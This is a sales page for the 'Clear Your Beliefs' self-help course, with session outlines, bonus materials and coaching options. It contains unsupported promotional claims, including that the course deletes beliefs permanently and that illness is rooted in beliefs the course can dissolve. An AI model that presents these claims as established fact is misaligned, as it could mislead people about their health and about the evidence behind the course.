src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a 